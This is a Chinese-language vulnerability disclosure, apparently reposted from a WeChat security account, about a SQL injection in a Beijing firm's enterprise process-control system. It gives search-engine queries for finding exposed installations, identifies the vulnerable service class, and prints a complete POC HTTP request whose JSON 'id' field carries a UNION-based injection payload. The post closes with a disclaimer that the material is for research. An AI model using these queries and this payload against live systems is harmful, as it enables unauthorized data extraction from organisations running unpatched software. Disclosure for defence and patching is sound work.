漏洞描述
北京时空智友科技有限公司是一家经营范围包括技术开发、技术推广、技术转让、技术咨询、技术服务等的公司。北京时空智友科技有限公司企业流程化管控系统存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息。
fofa-query: 'body="时空智友企业信息管理"'
360-query: 'favicon: "2464cbce5dd2681dd4fb62d055520d78" or body:"/common/login/bootstrap/css/bootstrap.min.css?v=1"'
该漏洞存在于com.qy960.service.IndexService
idea直接查找
var9是获取用户请求中json格式的参数 id拼接到sql语句中,无任何过滤或验证
2023年公开的另一个注入点:
https://mp.weixin.qq.com/s/-gOIOQ3K2lbsllncwvfrUg
POC:
POST /formservice?service=indexService.notice HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Connection: close Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/json Content-Length: 533 {"id":"1' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(99)+CHAR(122)+CHAR(104)+CHAR(87)+CHAR(88)+CHAR(65)+CHAR(108)+CHAR(74)+CHAR(81)+CHAR(90)+CHAR(118)+CHAR(84)+CHAR(120)+CHAR(79)+CHAR(88)+CHAR(103)+CHAR(65)+CHAR(107)+CHAR(121)+CHAR(79)+CHAR(86)+CHAR(112)+CHAR(121)+CHAR(104)+CHAR(76)+CHAR(66)+CHAR(121)+CHAR(121)+CHAR(66)+CHAR(67)+CHAR(98)+CHAR(77)+CHAR(67)+CHAR(88)+CHAR(81)+CHAR(113)+CHAR(120)+CHAR(119)+CHAR(78)+CHAR(65)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL-- BsLs"} ---
原文始发于微信公众号(Secu的矛与盾):北京时空智友科技有限公司企业流程化管控系统存在SQL注入漏洞(2024-新)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论